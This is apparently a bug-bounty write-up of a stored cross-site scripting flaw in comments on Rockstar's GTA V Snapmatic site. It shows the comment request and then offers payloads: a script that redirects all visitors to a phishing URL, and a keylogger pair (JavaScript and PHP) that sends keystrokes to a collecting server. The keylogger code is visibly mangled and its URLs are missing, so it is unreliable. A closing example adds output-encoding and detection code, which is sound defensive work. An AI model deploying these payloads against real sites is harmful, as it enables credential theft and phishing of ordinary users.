Stored XSS on Rockstar Game

Severity: High

Complexity : Easy

Weakness : Cross Site Scripting

Date : Nov 2016

  • Rockstar's current game, GTA V, has a feature called Snapmatic: an in-game app for taking pictures while playing, which then get uploaded at

  • The vulnerability: when commenting on a Snapmatic picture, they were not filtering malicious tags / JavaScript. The comment request looked like this:

```http
POST /games/gtav/snapmatic/ajax/comment HTTP/1.1
Connection: close
Content-Length: 57
Accept: application/json, text/javascript, */*; q=0.01
RequestVerificationToken: REDACTEDTOKEN
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/json
Accept-Language: en-US,en;q=0.8
Cookie: csrf:token<REDACTED>

{"ugcId":"PICTUREID","comment":"PAYLOAD HERE"}
```
  • I used the basic payload to check the response and got the script popup.
  • The worst part is that the script executed directly in the background when viewing images; this is probably because the first comments are rendered on the page.
  • To increase the impact, I tried to find ways to make other users post the payload as a comment on Snapmatic images, just like a worm, using AJAX calls, but unfortunately they were using extra protection with a CSRF check, as you can see from the request above.
  • As the payload gets rendered directly on the main page /snapmatic, we can redirect all users visiting /snapmatic to a URL of the attacker's choice, just like phishing:

```html
<script>window.onload = window.location.href = '';</script>
```
  • Or by adding a keylogger:
  • Keylog.js

```javascript
document.onkeypress = function(evt) {
evt = evt || window.event
key = String.fromCharCode(evt.charCode)
if (key) {
var http = new XMLHttpRequest();
var param = encodeURI(key)"POST","",true);
```

  • Keylog.php

```php
$fp = fopen($logfile, "a");
fwrite($fp, $key);
```
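The root cause above is that comment text was stored and later rendered on /snapmatic without output encoding. The following is an added example, not Rockstar's code, showing how a comment handler for the same JSON body (`ugcId`, `comment`, as seen in the request) would parse the input, HTML-encode it at render time so the stored payload is displayed as text rather than executed, and flag markup-bearing comments for log review. The length limit and the list-item template are assumptions.

```javascript
// Added example (not Rockstar's code): output-encode stored comments
// before they are rendered into the /snapmatic page.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that let text break out of an HTML text node or attribute.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Parse the JSON body the comment endpoint receives. Field names come from the
// request in the write-up; the 500-character limit is an assumed policy.
function parseCommentBody(rawBody) {
  const body = JSON.parse(rawBody);
  if (typeof body.ugcId !== 'string' || typeof body.comment !== 'string') {
    throw new Error('ugcId and comment must be strings');
  }
  if (body.comment.length > 500) throw new Error('comment too long');
  return { ugcId: body.ugcId, comment: body.comment };
}

// Render one stored comment as the fragment the page would embed. Encoding is
// applied here, at output time, for every comment including the first one shown.
function renderCommentHtml({ ugcId, comment }) {
  return `<li class="comment" data-ugc="${escapeHtml(ugcId)}">${escapeHtml(comment)}</li>`;
}

// Coarse heuristic for log review: does a stored comment carry a tag or an
// inline event handler? Useful for spotting payloads that got past the endpoint.
function looksLikeMarkup(comment) {
  return /<\s*\/?\s*[a-z!]/i.test(comment) || /\bon\w+\s*=/i.test(comment);
}

// Constructed sample body modelled on the write-up's request and redirect payload.
const SAMPLE_BODY = JSON.stringify({
  ugcId: 'PICTUREID',
  comment: "<script>window.onload = window.location.href = '';</script>",
});

// Demonstration: the stored payload is rendered inert.
const rendered = renderCommentHtml(parseCommentBody(SAMPLE_BODY));
console.log(rendered);
console.log('flagged:', looksLikeMarkup(JSON.parse(SAMPLE_BODY).comment));
```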

Security Analyst